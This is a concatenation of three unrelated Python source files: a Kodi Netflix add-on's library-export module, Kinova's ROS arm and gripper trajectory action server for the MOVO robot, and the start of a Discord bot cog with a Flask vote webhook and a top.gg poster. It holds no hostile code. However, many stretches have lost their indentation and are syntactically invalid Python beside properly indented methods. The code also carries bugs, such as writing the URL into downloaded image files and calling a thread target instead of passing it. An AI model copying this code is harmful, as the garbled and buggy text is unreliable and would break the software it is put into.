self.db[self.series_label][show_meta]['seasons'] = season_list
alt_title = self.db[self.series_label][show_meta]['alt_title']
show_dir = self.nx_common.check_folder_path(
path=os.path.join(self.tvshow_path, alt_title))
if xbmcvfs.exists(show_dir):
show_files = [f for f in xbmcvfs.listdir(show_dir) if xbmcvfs.exists(os.path.join(show_dir, f))]
for filename in show_files:
if 'S%02dE' % (season) in filename:
xbmcvfs.delete(os.path.join(show_dir, filename))
else:
episodes_list.append(filename.replace('.strm', ''))
self.db[self.series_label][show_meta]['episodes'] = episodes_list
self._update_local_db(filename=self.db_filepath, db=self.db)
return True
def remove_episode(self, title, season, episode):
"""Removes the DB entry & the strm files for an episode of a show given
Parameters
----------
title : :obj:`str`
Title of the show
season : :obj:`int`
Season sequence number
episode : :obj:`int`
Episode sequence number
Returns
-------
bool
Delete successfull
"""
title = re.sub(r'[?|$|!|:|#]', r'', title.encode('utf-8'))
episodes_list = []
show_meta = '%s' % (title)
episode_meta = 'S%02dE%02d' % (season, episode)
alt_title = self.db[self.series_label][show_meta]['alt_title']
show_dir = self.nx_common.check_folder_path(
path=os.path.join(self.tvshow_path, alt_title))
if xbmcvfs.exists(os.path.join(show_dir, episode_meta + '.strm')):
xbmcvfs.delete(os.path.join(show_dir, episode_meta + '.strm'))
for episode_entry in self.db[self.series_label][show_meta]['episodes']:
if episode_meta != episode_entry:
episodes_list.append(episode_entry)
self.db[self.series_label][show_meta]['episodes'] = episodes_list
self._update_local_db(filename=self.db_filepath, db=self.db)
return True
def list_exported_media(self):
"""Return List of exported movies
Returns
-------
obj:`dict`
Contents of export folder
"""
movies = (['', ''])
shows = (['', ''])
movie_path = self.movie_path
tvshow_path = self.tvshow_path
if xbmcvfs.exists(self.nx_common.check_folder_path(movie_path)):
movies = xbmcvfs.listdir(movie_path)
if xbmcvfs.exists(self.nx_common.check_folder_path(tvshow_path)):
shows = xbmcvfs.listdir(tvshow_path)
return movies + shows
    def list_exported_shows(self):
        """Return the dict of shows tracked in the local library DB."""
        return self.db[self.series_label]
    def get_exported_movie_year(self, title):
        """Return year of given exported movie

        Returns
        -------
        obj:`int`
            year of given movie, or 0 when the movie folder does not exist
        """
        year = '0000'
        folder = self.nx_common.check_folder_path(
            path=os.path.join(self.movie_path, title))
        if xbmcvfs.exists(folder):
            file = xbmcvfs.listdir(folder)
            # NOTE(review): ``file[1]`` is the files list of the
            # (dirs, files) tuple; str() of that whole list happens to
            # contain "Title (YYYY).strm", so the split chain extracts the
            # year -- but it relies on the folder holding exactly one
            # exported file. Verify.
            year = str(file[1]).split('(', 1)[1].split(')', 1)[0]
        return int(year)
    def updatedb_from_exported(self):
        """Adds movies and shows from exported media to the local db

        Rebuilds DB entries from what is on disk: movie years are parsed
        from "Title (YYYY).strm" file names and episodes from
        "SxxEyy.strm" file names.

        Returns
        -------
        bool
            Process finished
        """
        tv_show_path = self.tvshow_path
        db_filepath = self.db_filepath
        if xbmcvfs.exists(self.nx_common.check_folder_path(self.movie_path)):
            movies = xbmcvfs.listdir(self.movie_path)
            # listdir yields (dirs, files); [0] are the per-movie folders
            for video in movies[0]:
                folder = os.path.join(self.movie_path, video)
                file = xbmcvfs.listdir(folder)
                # NOTE(review): parses the year out of str(files_list);
                # works only when the folder holds exactly one
                # "Title (YYYY).strm" -- confirm.
                year = int(str(file[1]).split("(", 1)[1].split(")", 1)[0])
                alt_title = unicode(video.decode('utf-8'))  # Python 2 only
                title = unicode(video.decode('utf-8'))
                movie_meta = '%s (%d)' % (title, year)
                if self.movie_exists(title=title, year=year) is False:
                    self.db[self.movies_label][movie_meta] = {
                        'alt_title': alt_title}
                    self._update_local_db(filename=db_filepath, db=self.db)
        if xbmcvfs.exists(self.nx_common.check_folder_path(tv_show_path)):
            shows = xbmcvfs.listdir(tv_show_path)
            for video in shows[0]:
                show_dir = os.path.join(tv_show_path, video)
                title = unicode(video.decode('utf-8'))
                alt_title = unicode(video.decode('utf-8'))
                show_meta = '%s' % (title)
                if self.show_exists(title) is False:
                    # NOTE(review): 'seasons' stays empty here and is not
                    # rebuilt from the episode files below; netflix_id is
                    # also absent. Confirm whether that is intended.
                    self.db[self.series_label][show_meta] = {
                        'seasons': [],
                        'episodes': [],
                        'alt_title': alt_title}
                episodes = xbmcvfs.listdir(show_dir)
                # [1] are the exported "SxxEyy.strm" files
                for episode in episodes[1]:
                    file = str(episode).split(".")[0]
                    season = int(str(file).split("S")[1].split("E")[0])
                    episode = int(str(file).split("E")[1])
                    episode_meta = 'S%02dE%02d' % (season, episode)
                    episode_exists = self.episode_exists(
                        title=title,
                        season=season,
                        episode=episode)
                    if episode_exists is False:
                        self.db[self.series_label][title]['episodes'].append(episode_meta)
                        self._update_local_db(
                            filename=self.db_filepath,
                            db=self.db)
        return True
def download_image_file(self, title, url):
"""Writes thumb image which is shown in exported
Parameters
----------
title : :obj:`str`
Filename based on title
url : :obj:`str`
Image url
Returns
-------
bool
Download triggered
"""
title = re.sub(r'[?|$|!|:|#]', r'', title)
imgfile = title + '.jpg'
file = os.path.join(self.imagecache_path, imgfile)
folder_movies = self.nx_common.check_folder_path(
path=os.path.join(self.movie_path, title))
folder_tvshows = self.nx_common.check_folder_path(
path=os.path.join(self.tvshow_path, title))
file_exists = xbmcvfs.exists(file)
folder_exists = xbmcvfs.exists(folder_movies)
tv_shows_folder = xbmcvfs.exists(folder_tvshows)
if not file_exists and (folder_exists or tv_shows_folder):
thread = threading.Thread(target=self.fetch_url, args=(url, file))
thread.start()
return True
def fetch_url(self, url, file):
f = xbmcvfs.File(file, 'wb')
f.write(requests.get(url).content)
f.write(url)
f.close()
def get_previewimage(self, title):
"""Load thumb image which is shown in exported
Parameters
----------
title : :obj:`str`
Filename based on title
url : :obj:`str`
Image url
Returns
-------
obj:`int`
image of given title if exists
"""
title = re.sub(r'[?|$|!|:|#]', r'', title)
imgfile = title + '.jpg'
file = os.path.join(self.imagecache_path, imgfile)
if xbmcvfs.exists(file):
return file
return ""
|
movo_arm_jtas.py | """--------------------------------------------------------------------
Copyright (c) 2017, Kinova Robotics inc.
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
\file movo_arm_jtas.py
\brief This module offer an interface to control the movo arms
\Platform: Ubuntu 16.04 LTS / ROS Kinetic
--------------------------------------------------------------------"""
from movo_joint_interface.jaco_joint_controller import SIArmController
from trajectory_smoother import TrajectorySmoother
from moveit_python import MoveGroupInterface
from moveit_msgs.msg import MoveItErrorCodes
from control_msgs.msg import (
FollowJointTrajectoryAction,
FollowJointTrajectoryFeedback,
FollowJointTrajectoryResult,
GripperCommandAction,
GripperCommandFeedback,
GripperCommandResult,
)
from trajectory_msgs.msg import JointTrajectoryPoint
from std_msgs.msg import UInt16,Bool
from movo_msgs.msg import Status
from threading import Thread
import errno
import math
import rospy
import actionlib
import bisect
import operator
from copy import deepcopy
def calc_grip_dist(b):
    """Convert a pair of gripper finger angles (rad) into an opening distance (m).

    Each finger contributes a linkage length derived from its angle; the
    summed length is shifted by an empirically calibrated offset (different
    for the near-closed and open regimes) and converted from mm to m.
    """
    total = 0.0
    for angle in (b[0], b[1]):
        total += 30.9476 - 87.0932 * math.sin(angle - 0.627445866)
    # Calibration offset: readings below the nominal fully-open sum are
    # shifted down, readings at/above it are shifted slightly up.
    if total < 2 * 30.9476:
        total -= 17.0
    else:
        total += 1.08
    return total * 0.001
def calc_grip_angle(x):
    """Convert a gripper opening distance (m) into a single finger angle (rad).

    Inverse of the per-finger linkage relation used by calc_grip_dist, with
    its own empirical correction for the open vs. near-closed regimes.
    """
    half_mm = 0.5 * (x * 1000.0)
    angle = math.asin((half_mm - 30.9476) / -87.0932) + 0.627445866
    # Calibration offset mirrors calc_grip_dist's two regimes.
    if half_mm > 30.9476:
        return angle + 0.00599
    return angle - 0.1
class MovoArmJTAS(object):
    def __init__(self, prefix="", gripper="", interface='eth0', jaco_ip="10.66.171.15", dof="", rate=100.0):
        """Create the trajectory and gripper action servers for one arm.

        Parameters
        ----------
        prefix : str
            Arm side prefix (e.g. 'left'/'right') used to namespace joints and topics.
        gripper : str
            Gripper model id ('kg2', 'kg3' or 'rq85'); selects stall thresholds.
        interface : str
            Network interface used by the arm controller.
        jaco_ip : str
            IP address of the JACO arm controller.
        dof : str
            '6dof' or '7dof'; selects joint naming scheme and homed pose.
        rate : float
            Trajectory control loop rate in Hz.
        """
        self._alive = False
        self.init_success = True
        self._action_name = rospy.get_name()
        self._prefix = prefix
        # Action Feedback/Result
        # Gripper stall-force threshold depends on the gripper model.
        if ("kg2" == gripper) or ("rq85" == gripper):
            self.gripper_stall_force = 20.0
            self.gripper_dead_zone = 0.01
        elif("kg3" == gripper):
            self.gripper_stall_force = 30.0
            self.gripper_dead_zone = 0.01
        # NOTE(review): no thresholds are set for any other gripper string, so
        # the gripper action callbacks would hit AttributeError — confirm
        # callers always pass a supported model.
        self._last_gripper_pos = 0.165
        self._gripper_stall_to = 0.7
        self._gripper_pos_stall = False
        self._last_movement_time = rospy.get_time()
        self.dof = dof
        self._planner_homing = False
        """
        Define the joint names
        """
        if ("6dof" == dof):
            self._joint_names = [self._prefix+'_shoulder_pan_joint',
                                 self._prefix+'_shoulder_lift_joint',
                                 self._prefix+'_elbow_joint',
                                 self._prefix+'_wrist_1_joint',
                                 self._prefix+'_wrist_2_joint',
                                 self._prefix+'_wrist_3_joint']
            self._body_joints = ["right_elbow_joint",
                                 "right_shoulder_lift_joint",
                                 "right_shoulder_pan_joint",
                                 "right_wrist_1_joint",
                                 "right_wrist_2_joint",
                                 "right_wrist_3_joint",
                                 "left_elbow_joint",
                                 "left_shoulder_lift_joint",
                                 "left_shoulder_pan_joint",
                                 "left_wrist_1_joint",
                                 "left_wrist_2_joint",
                                 "left_wrist_3_joint",
                                 "linear_joint",
                                 "pan_joint",
                                 "tilt_joint"]
            # Upper-body pose (rad, plus linear joint in m) used by the homing planner.
            self._homed = [-2.135, -0.227, -1.478, -2.083, 1.445, 1.321, 2.135, 0.227, 1.478, 2.083, -1.445, -1.321, 0.25, 0.0, 0.0]
        elif ("7dof" == dof):
            self._joint_names = [self._prefix + '_shoulder_pan_joint',
                                 self._prefix + '_shoulder_lift_joint',
                                 self._prefix + '_arm_half_joint',
                                 self._prefix + '_elbow_joint',
                                 self._prefix + '_wrist_spherical_1_joint',
                                 self._prefix + '_wrist_spherical_2_joint',
                                 self._prefix + '_wrist_3_joint']
            self._body_joints = ["right_shoulder_pan_joint",
                                 "right_shoulder_lift_joint",
                                 "right_arm_half_joint",
                                 "right_elbow_joint",
                                 "right_wrist_spherical_1_joint",
                                 "right_wrist_spherical_2_joint",
                                 "right_wrist_3_joint",
                                 "left_shoulder_pan_joint",
                                 "left_shoulder_lift_joint",
                                 "left_arm_half_joint",
                                 "left_elbow_joint",
                                 "left_wrist_spherical_1_joint",
                                 "left_wrist_spherical_2_joint",
                                 "left_wrist_3_joint",
                                 "linear_joint",
                                 "pan_joint",
                                 "tilt_joint"]
            self._homed = [-1.5, -0.2, -0.15, -2.0, 2.0, -1.24, -1.1, 1.5, 0.2, 0.15, 2.0, -2.0, 1.24, 1.1, 0.25, 0, 0]
        else:
            rospy.logerr("DoF needs to be set 6 or 7, cannot start MovoArmJTAS")
            return
        """
        Controller parameters from arguments, messages, and dynamic
        reconfigure
        """
        self._trajectory_control_rate = rate # Hz
        self._goal_time = 0.0
        self._stopped_velocity = 0.0
        self._goal_error = dict()
        self._path_thresh = dict()
        self._traj_smoother = TrajectorySmoother(rospy.get_name(),self._prefix)
        self._ctl = SIArmController(self._prefix,gripper,interface,jaco_ip, dof)
        # Arm starts paused; it is resumed when a trajectory/gripper goal arrives.
        self._ctl.Pause()
        self._estop_delay = 0
        self.home_arm_sub = rospy.Subscriber('/movo/home_arms', Bool, self._home_arms)
        self.home_arm_pub = rospy.Publisher('/movo/arms_are_homed', Bool, queue_size=1)
        self._arms_homing = False
        if not self._ctl.init_success:
            rospy.logerr("Failed to initialize controller, make sure the serial number exists")
            self.clean_shutdown()
            self.init_success = False
            return
        self.estop = False
        self._fdbk = FollowJointTrajectoryFeedback()
        self._result = FollowJointTrajectoryResult()
        #self._dyn = reconfig_server
        self._ns = '/movo/%s_arm_controller'%self._prefix
        self._fjt_ns = self._ns + '/follow_joint_trajectory'
        self._server = actionlib.SimpleActionServer(
            self._fjt_ns,
            FollowJointTrajectoryAction,
            execute_cb=self._on_trajectory_action,
            auto_start=False)
        self._alive = True
        self._movo_status_sub = rospy.Subscriber("/movo/feedback/status",Status,self._update_movo_status)
        self._server.start()
        # Action Server
        self._gripper_server = actionlib.SimpleActionServer(
            '/movo/%s_gripper_controller/gripper_cmd'%self._prefix,
            GripperCommandAction,
            execute_cb=self._on_gripper_action,
            auto_start=False)
        self._gripper_server.start()
        self._gripper_action_name = '/movo/%s_gripper_controller/gripper_cmd'%self._prefix
        # Action Feedback/Result
        self._gripper_fdbk = GripperCommandFeedback()
        self._gripper_result = GripperCommandResult()
        self._gripper_timeout = 6.0
        self._ctl.api.InitFingers()
    def _home_arm_planner(self):
        """Home the arms: plan the upper body to the stored homed pose, then
        run the arm's factory MoveHome/InitFingers sequence.

        Only the non-left instance runs the MoveIt plan; the left instance
        sleeps 5 s first — presumably to let the right-arm node's plan move
        both arms before this side homes (TODO confirm).
        """
        if self._prefix == 'left':
            rospy.sleep(5)
        else:
            move_group_jtas = MoveGroupInterface("upper_body", "base_link")
            move_group_jtas.setPlannerId("RRTConnectkConfigDefault")
            success = False
            # Retry planning until it succeeds or ROS shuts down.
            while not rospy.is_shutdown() and not success:
                result = move_group_jtas.moveToJointPosition(self._body_joints, self._homed, 0.05)
                if result.error_code.val == MoveItErrorCodes.SUCCESS:
                    # NOTE(review): success is reported via logerr — likely
                    # should be loginfo.
                    rospy.logerr("_home_arm_planner completed ")
                    success = True
                else:
                    rospy.logerr("_home_arm_planner: _home_arm_planner failed (%d)" % result.error_code.val)
        # While homing, _update_movo_status keeps the arm E-stopped.
        self._arms_homing = True
        self._ctl.api.MoveHome()
        self._ctl.api.InitFingers()
        self.home_arm_pub.publish(Bool(True))
        rospy.sleep(2.0)
        self._arms_homing = False
        self._planner_homing = False
    def _update_gripper_feedback(self, position):
        """Refresh gripper action feedback/result from the controller state.

        Updates position (m), summed finger effort, and the stalled /
        reached_goal flags. A stall is declared either on excess force or on
        no measurable motion for longer than self._gripper_stall_to seconds.

        position: commanded opening distance (m) the goal is measured against.
        """
        tmp = self._ctl.GetGripperFdbk()
        grip_dist = calc_grip_dist(tmp[0])
        self._gripper_fdbk.position = grip_dist
        self._gripper_fdbk.effort = sum(tmp[2])
        self._gripper_fdbk.stalled = (self._gripper_fdbk.effort >
                                      self.gripper_stall_force)
        self._gripper_fdbk.reached_goal = (math.fabs(grip_dist -
                                                     position) <
                                           self.gripper_dead_zone)
        # Position-based stall detection: movement below 5 mm does not reset
        # the stall timer.
        delta = math.fabs(self._gripper_fdbk.position - self._last_gripper_pos)
        self._last_gripper_pos = self._gripper_fdbk.position
        if (delta > 0.005):
            self._last_movement_time = rospy.get_time()
        if (rospy.get_time() - self._last_movement_time) > self._gripper_stall_to:
            self._gripper_pos_stall=True
        else:
            self._gripper_pos_stall=False
        self._gripper_fdbk.stalled |= self._gripper_pos_stall
        # The result aliases the feedback message, so it always reflects the
        # most recent state when the action completes.
        self._gripper_result = self._gripper_fdbk
        self._gripper_server.publish_feedback(self._gripper_fdbk)
def _command_gripper(self, position):
ang = calc_grip_angle(position)
self._ctl.CommandGripper(ang)
def _check_gripper_state(self):
return (self._gripper_fdbk.stalled or self._gripper_fdbk.reached_goal)
def _on_gripper_action(self, goal):
# Store position and effort from call
# Position to 0:0.165 == close:open
position = goal.command.position
effort = goal.command.max_effort
print position
# Reset feedback/result
self._update_gripper_feedback(position)
# 20 Hz gripper state rate
control_rate = rospy.Rate(20.0)
# Record start time
start_time = rospy.get_time()
self._ctl.Resume()
def now_from_start(start):
return rospy.get_time() - start
# Continue commanding goal until success or timeout
self._last_movement_time = rospy.get_time()
self._last_gripper_pos = self._gripper_fdbk.position
while ((now_from_start(start_time) < self._gripper_timeout or
self._gripper_timeout < 0.0) and not rospy.is_shutdown()):
if self._gripper_server.is_preempt_requested():
self._ctl.StopGripper()
rospy.loginfo("%s: Gripper Action Preempted" %
(self._gripper_action_name,))
self._gripper_server.set_preempted(self._gripper_result)
return
self._update_gripper_feedback(position)
if self._check_gripper_state():
self._gripper_server.set_succeeded(self._gripper_result)
return
self._command_gripper(position)
control_rate.sleep()
# Gripper failed to achieve goal before timeout/shutdown
self._ctl.StopGripper()
if not rospy.is_shutdown():
rospy.logerr("%s: Gripper Command Not Achieved in Allotted Time" %
(self._gripper_action_name,))
self._update_gripper_feedback(position)
self._gripper_server.set_aborted(self._gripper_result)
def _home_arms(self,cmd):
if (True == cmd.data and self._planner_homing == False):
self._planner_homing = True
b_thread = Thread(target=self._home_arm_planner(), args='')
b_thread.daemon = True
b_thread.start()
def _update_movo_status(self,status):
if (0 != status.dynamic_response) or (False == self._ctl.GetCtlStatus()) or self._arms_homing:
self.estop = True
self._ctl.SetEstop()
self._estop_delay = 100
else:
if (0 == self._estop_delay):
self.estop = False
self._ctl.ClearEstop()
else:
self.estop = True
self._ctl.SetEstop()
self._estop_delay -= 1
def robot_is_enabled(self):
return not self.estop
    def clean_shutdown(self):
        """Stop the arm controller and mark this node as no longer alive."""
        self._ctl.Stop()
        self._alive = False
    def _get_trajectory_parameters(self, joint_names, goal):
        """
        For each input trajectory, if path, goal, or goal_time tolerances
        provided, we will use these as opposed to reading from the
        parameter server/dynamic reconfigure
        """
        """
        Goal time tolerance - time buffer allowing goal constraints to be met
        """
        if goal.goal_time_tolerance:
            self._goal_time = goal.goal_time_tolerance.to_sec()
        else:
            self._goal_time = 1.0
        """
        Stopped velocity tolerance - max velocity at end of execution
        """
        self._stopped_velocity = 0.5
        """
        Path execution and goal tolerances per joint
        """
        for jnt in joint_names:
            if jnt not in self._joint_names:
                # Unknown joint: abort the whole goal immediately.
                rospy.logerr(
                    "%s: Trajectory Aborted - Provided Invalid Joint Name %s" %
                    (self._action_name, jnt,))
                self._result.error_code = self._result.INVALID_JOINTS
                self._server.set_aborted(self._result)
                return
            """
            Path execution tolerance
            """
            # Default 0.5 rad; overridden by a matching entry in the goal.
            self._path_thresh[jnt] = 0.5
            if goal.path_tolerance:
                for tolerance in goal.path_tolerance:
                    if jnt == tolerance.name:
                        self._path_thresh[jnt] = tolerance.position
            """
            Goal error tolerance
            """
            # Default 0.5 rad; overridden by a matching entry in the goal.
            self._goal_error[jnt] = 0.5
            if goal.goal_tolerance:
                for tolerance in goal.goal_tolerance:
                    if jnt == tolerance.name:
                        self._goal_error[jnt] = tolerance.position
    def _get_current_position(self, joint_names):
        """Return the measured positions of joint_names, in the given order."""
        return self._ctl.GetCurrentJointPosition(joint_names)
    def _get_current_velocities(self, joint_names):
        """Return the measured velocities of joint_names, in the given order."""
        return self._ctl.GetCurrentJointVelocity(joint_names)
    def _get_current_errors(self, joint_names):
        """Return (joint_name, position_error) pairs for joint_names."""
        error = self._ctl.GetCurrentJointPositionError(joint_names)
        # Python 2 zip() returns a list, so callers may iterate it repeatedly.
        return zip(joint_names, error)
    def _update_feedback(self, cmd_point, joint_names, cur_time):
        """Publish FollowJointTrajectory feedback for the current control step.

        cmd_point: the commanded JointTrajectoryPoint; cur_time: seconds
        elapsed since trajectory start.
        """
        # NOTE(review): header.stamp is assigned a rospy.Duration here; a
        # rospy.Time (e.g. rospy.Time.now()) is the conventional type — confirm.
        self._fdbk.header.stamp = rospy.Duration.from_sec(rospy.get_time())
        self._fdbk.joint_names = joint_names
        self._fdbk.desired = cmd_point
        self._fdbk.desired.time_from_start = rospy.Duration.from_sec(cur_time)
        self._fdbk.actual.positions = self._get_current_position(joint_names)
        self._fdbk.actual.time_from_start = rospy.Duration.from_sec(cur_time)
        # Element-wise desired - actual (Python 2 map() returns a list).
        self._fdbk.error.positions = map(operator.sub,
                                         self._fdbk.desired.positions,
                                         self._fdbk.actual.positions
                                        )
        self._fdbk.error.time_from_start = rospy.Duration.from_sec(cur_time)
        self._server.publish_feedback(self._fdbk)
    def _command_stop(self):
        """Halt motion by latching, then immediately releasing, a position hold."""
        self._ctl.SetPositionHold()
        self._ctl.ClearPositionHold()
    def _command_joints(self, joint_names, point, dimensions_dict):
        """Send one trajectory point to the controller.

        Returns False (after stopping the arm and finishing the action) on
        preemption, E-stop, or a path-tolerance violation; True when the
        command was issued. dimensions_dict flags whether the point carries
        velocities/accelerations.
        """
        if self._server.is_preempt_requested() or not self.robot_is_enabled():
            rospy.loginfo("%s: Trajectory Preempted" % (self._action_name,))
            self._server.set_preempted()
            self._command_stop()
            return False
        deltas = self._get_current_errors(joint_names)
        for delta in deltas:
            # A negative threshold disables the path check for that joint.
            if ((math.fabs(delta[1]) >= self._path_thresh[delta[0]]
                and self._path_thresh[delta[0]] >= 0.0)) or not self.robot_is_enabled():
                rospy.logerr("%s: Exceeded Error Threshold on %s: %s" %
                             (self._action_name, delta[0], str(delta[1]),))
                self._result.error_code = self._result.PATH_TOLERANCE_VIOLATED
                self._server.set_aborted(self._result)
                self._command_stop()
                return False
        pos = dict(zip(joint_names, point.positions))
        # Default to zero velocity/acceleration when the point omits them.
        vel = dict(zip(joint_names, [0.0]*len(joint_names)))
        acc = dict(zip(joint_names, [0.0]*len(joint_names)))
        if dimensions_dict['velocities']:
            vel = dict(zip(joint_names, point.velocities))
        if dimensions_dict['accelerations']:
            acc = dict(zip(joint_names, point.accelerations))
        if self._alive:
            self._ctl.CommandJoints(pos, vel, acc)
        return True
    def _check_goal_state(self, joint_names, last):
        """Tri-state goal verification.

        Returns the offending joint name (str) when a goal position tolerance
        is violated, False when the arm is still moving faster than the
        stopped-velocity threshold, and True when the goal is satisfied.
        `last` is accepted for signature compatibility but not used here.
        """
        for error in self._get_current_errors(joint_names):
            # A non-positive goal tolerance disables the check for that joint.
            if (self._goal_error[error[0]] > 0
                and self._goal_error[error[0]] < math.fabs(error[1])):
                return error[0]
        if (self._stopped_velocity > 0.0 and
            max([abs(cur_vel) for cur_vel in self._get_current_velocities(joint_names)]) >
            self._stopped_velocity):
            return False
        else:
            return True
    def _on_trajectory_action(self, goal):
        """Execute a FollowJointTrajectory goal.

        Smooths the incoming trajectory, interpolates it with Bezier segments
        at the configured control rate, keeps commanding the final point
        until the goal-time tolerance expires, and finally reports success or
        the specific tolerance violation.
        """
        joint_names = goal.trajectory.joint_names
        self._get_trajectory_parameters(joint_names, goal)
        success,results = self._traj_smoother.ProcessTrajectory(goal.trajectory,
                                                                self._get_current_position(joint_names),
                                                                False)
        if not success:
            self._server.set_aborted()
            return
        """
        Copy the results to variables that make sense namewise
        """
        dimensions_dict = results[0]
        b_matrix = results[1]
        trajectory_points = results[2]
        pnt_times = results[3]
        num_points = results[4]
        """
        Wait for the specified execution time, if not provided use now
        """
        start_time = goal.trajectory.header.stamp.to_sec()
        now = rospy.get_time()
        if start_time == 0.0:
            start_time = rospy.get_time()
        # Busy-wait until the requested start stamp is reached.
        while start_time > now:
            now = rospy.get_time()
        """
        Loop until end of trajectory time. Provide a single time step
        of the control rate past the end to ensure we get to the end.
        Keep track of current indices for spline segment generation
        """
        self._ctl.Resume()
        control_rate = rospy.Rate(self._trajectory_control_rate)
        now_from_start = rospy.get_time() - start_time
        end_time = trajectory_points[-1].time_from_start.to_sec()
        while (now_from_start < end_time and not rospy.is_shutdown() and
               self.robot_is_enabled()):
            now = rospy.get_time()
            now_from_start = now - start_time
            # Segment index for the current elapsed time.
            idx = bisect.bisect(pnt_times, now_from_start)
            """
            Calculate percentage of time passed in this interval
            """
            if idx >= num_points:
                cmd_time = now_from_start - pnt_times[-1]
                t = 1.0
            elif idx >= 0:
                cmd_time = (now_from_start - pnt_times[idx-1])
                t = cmd_time / (pnt_times[idx] - pnt_times[idx-1])
            else:
                cmd_time = 0.0
                t = 0.0
            point = self._traj_smoother.GetBezierPoint(b_matrix,
                                                       idx,
                                                       t,
                                                       cmd_time,
                                                       dimensions_dict)
            """
            Command Joint Position, Velocity, Acceleration
            """
            command_executed = self._command_joints(joint_names, point, dimensions_dict)
            self._update_feedback(deepcopy(point), joint_names, now_from_start)
            """
            Break the loop if the command cannot be executed
            """
            if not command_executed:
                return
            control_rate.sleep()
        """
        Keep trying to meet goal until goal_time constraint expired
        """
        last = trajectory_points[-1]
        last_time = trajectory_points[-1].time_from_start.to_sec()
        # NOTE(review): end_angles is computed but never used below.
        end_angles = dict(zip(joint_names, last.positions))
        while (now_from_start < (last_time + self._goal_time)
               and not rospy.is_shutdown() and self.robot_is_enabled()):
            if not self._command_joints(joint_names, last, dimensions_dict):
                return
            now_from_start = rospy.get_time() - start_time
            self._update_feedback(deepcopy(last), joint_names,
                                  now_from_start)
            control_rate.sleep()
        now_from_start = rospy.get_time() - start_time
        self._update_feedback(deepcopy(last), joint_names,
                              now_from_start)
        """
        Verify goal constraint
        """
        # _check_goal_state is tri-state: True, False, or a joint name (str).
        result = self._check_goal_state(joint_names, last)
        if result is True:
            rospy.loginfo("%s: Joint Trajectory Action Succeeded for %s arm" %
                          (self._action_name, self._prefix))
            self._result.error_code = self._result.SUCCESSFUL
            self._server.set_succeeded(self._result)
        elif result is False:
            rospy.logerr("%s: Exceeded Max Goal Velocity Threshold for %s arm" %
                         (self._action_name, self._prefix))
            self._result.error_code = self._result.GOAL_TOLERANCE_VIOLATED
            self._server.set_aborted(self._result)
        else:
            rospy.logerr("%s: Exceeded Goal Threshold Error %s for %s arm" %
                         (self._action_name, result, self._prefix))
            self._result.error_code = self._result.GOAL_TOLERANCE_VIOLATED
            self._server.set_aborted(self._result)
        self._command_stop()
        self._ctl.Pause()
|
coglib.py | import json
from threading import Thread
from typing import Optional, Callable, Union
from discord.ext.commands import Context
from discord_slash import SlashContext
from flask import Flask, jsonify, request, Response
from requests import post
from .classes import CogPlus, BotPlus
from .database.translation import Translation
from .errors import InteractionError, UnexpectedError
from .extra import __agent__
from .task import TaskPlus
class API(CogPlus):
    """Small Flask sidecar cog exposing health-check and vote-webhook endpoints."""
    def __init__(self, bot: BotPlus, import_name, **kwargs):
        super().__init__(bot)
        self.app = Flask(import_name, **kwargs)
        self._auth = None    # shared secret expected in the Authorization header
        self._thread = None  # background thread running the Flask server
        # NOTE(review): '/' is routed to ping(), leaving main() unused —
        # confirm whether '/' was meant to serve main() instead.
        self.app.add_url_rule('/', None, self.ping)
        self.app.add_url_rule('/ping', None, self.ping)
        self.app.add_url_rule('/vote', None, self.vote, methods=['POST'])
    def set_auth(self, auth):
        """Set the shared secret used to authenticate incoming vote webhooks."""
        self._auth = auth
    def main(self):
        """Full status payload: bot name, online state, and latency in ms."""
        return jsonify(Name=self.bot.user.name, Status='Online' if self.bot.is_ready() else 'Offline', Ping=self.bot.latency * 1000 if self.bot.is_ready() else 0)
    def ping(self):
        """Lightweight status payload: online state and latency in ms."""
        return jsonify(Status='Online' if self.bot.is_ready() else 'Offline', Ping=self.bot.latency * 1000 if self.bot.is_ready() else 0)
    def vote(self):
        """Handle a top.gg-style vote webhook; dispatches 'vote'/'test_vote' events.

        Returns 401 when the Authorization header does not match the secret
        (or no secret is configured), or when the payload type is unknown.
        """
        req_auth = request.headers.get('Authorization')
        if self._auth == req_auth and self._auth is not None:
            data = request.json or request.form or request.args or {}
            if data.get('type', None) == 'upvote':
                event_name = 'vote'
            elif data.get('type', None) == 'test':
                event_name = 'test_vote'
            else:
                return Response(status=401)
            self.bot.dispatch(event_name, data)
            return Response(status=200)
        else:
            return Response(status=401)
    def run(self, host=None, port=None, debug=None, load_dotenv=True, **options):
        """Start the Flask app on a daemon thread so it never blocks the bot."""
        self._thread = Thread(target=lambda: self.app.run(host, port, debug, load_dotenv=load_dotenv, **options))
        # Fix: Thread.setDaemon() is deprecated (removal planned); assign the
        # daemon attribute instead. Behavior is identical.
        self._thread.daemon = True
        self._thread.start()
class TopGGPoster(TaskPlus):
    """Periodic task that POSTs the bot's server (and optional shard) stats to top.gg."""
    def __init__(self, bot: BotPlus, token: str, timer: float = 1800):
        # timer: posting interval in seconds (default 30 minutes).
        super().__init__(bot, seconds=timer)
        self.token = token  # top.gg API token, sent as the Authorization header
        # Optional sharding info; included in the payload only when the caller sets it.
        self.shard_count: Optional[int] = None
